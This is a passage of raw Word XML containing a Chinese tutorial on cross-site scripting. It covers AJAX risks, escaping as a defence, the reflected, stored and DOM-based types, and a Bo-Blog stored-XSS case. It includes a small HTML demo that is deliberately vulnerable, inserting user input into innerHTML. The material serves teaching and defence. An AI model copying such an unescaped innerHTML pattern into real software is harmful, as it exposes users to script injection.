        <w:t>的最大优点，就是可以不用更新整个页面来维护数据，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用可以更迅速地响应用户请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AJAX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会处理来自</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId257" w:tgtFrame="_blank" w:tooltip="Web服务器" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0268CD"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Web</w:t>
        </w:r>
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0268CD"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>服务器</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>及源自第三方的丰富信息，这对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击提供了良好的机会。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AJAX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用架构会泄漏更多应用的细节，如函数和变量名称、函数参数及返回类型、数据类型及有效范围等。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AJAX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用架构还有着较传统架构更多的应用输入，这就增加了可被攻击的点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D27AE" w:rsidRPr="00F41A4C" w:rsidRDefault="009D27AE" w:rsidP="009D0C20">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如何防御：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D27AE" w:rsidRPr="00F41A4C" w:rsidRDefault="009D27AE" w:rsidP="009D0C20">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>利用了脚本注入，因此我们解决办法其实很简单，不信赖用户输入，对特殊字符如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”&lt;”,”&gt;”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>转义，就可以从根本上防止这一问题</w:t>
      </w:r>
      <w:r w:rsidR="00976E8A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w: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根据</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跨站脚本攻击存在的形式及产生的效果，可以将其分为以下三类。</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一、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>反射型</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跨站脚本攻击</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反射型</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脚本攻击即如我们上面所提到的</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跨站脚本攻击方式，该类型只是简单地将用户输入的数据直接或未经过完善的安全过滤就在浏览器中进行输出，导致输出的数据中存在可被浏览器执行的代码数据。由</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>于此种类型的跨站代码存在于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>中，所以黑客通常需要通过诱骗或加</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>密变形等方式，将存在恶意代码的链接发给用户，只有用户点击以后才能使得攻击成功实施。</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二、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>存储型</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跨站脚本攻击</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存储型</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脚本攻击是指</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用程序会将用户输入的数据信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47DB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>保存在服务端的数据库或其他文件形式中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，网页进行数据查询展示时，会从数据库中获取数据内容，并将数据内容在网页中进行输出展示，因此存储型</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具有较强的稳定性。</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存储型</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脚本攻击最为常见的场景就是在博客或新闻发布系统中，黑客将包含有恶意代码的数据信息直接写入文章或文章评论中，所有浏览文章或评论的用户，都会在他们客户端浏览器环境中执行插入的恶意代码。如流行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Bo-Blog</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>程序的早期版本中存在对用户提交评论数据过滤不严导致的</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跨站脚本攻击漏洞，黑客可以在文章评论中提交插入恶意数据的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>UBB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>代码，提交后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Bo-Blog</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>程序会将数据保存至数据库中，当用户浏览该日志时，就会执行插入的恶意代码，如图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4652998" cy="3343701"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="图片 7" descr="http://up.2cto.com/2012/1223/201212231224153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up.2cto.com/2012/1223/20121223122415364.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId258" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4652687" cy="3343478"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3</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lastRenderedPageBreak/>
        <w:t>三、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</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跨站脚本攻击</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基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</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跨站脚本攻击是</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>通过修改页面</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>节点数据信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>而形成的</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跨站脚本攻击。不同于反射型</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和存储型</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，基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</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跨站脚本攻击往往需要针对具体的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>javascript DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>代码进行分析，并根据实际情况进行</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跨站脚本攻击的利用。让我们来针对如下代码进行详细分析：</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&lt;html&gt;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&lt;head&gt;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&lt;title&gt;DOM Based XSS Demo&lt;/title&gt;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&lt;script&gt;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function xsstest()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 var str = document.getElementById("input").value;</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 document.getElementById("output").innerHTML = "&lt;img src='"+str+"'&gt;&lt;/img&gt;";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&lt;/script&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;div id="output"&gt;&lt;/div&gt;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&lt;input type="text" id="input" size=50 value="" /&gt;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&lt;input type="button" value="</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>" onclick="xsstest()" /&gt;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&lt;/body&gt;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&lt;/html&gt;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以上代码的作用是提交一个图片的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>地址以后，程序会将图片在页面中进行展示，如我们提交百度</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>LOGO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图片的地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>http://www.baidu.com/img/baidu_sylogo1.gif</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，那么在页面中展示结果如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4271645" cy="2136140"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
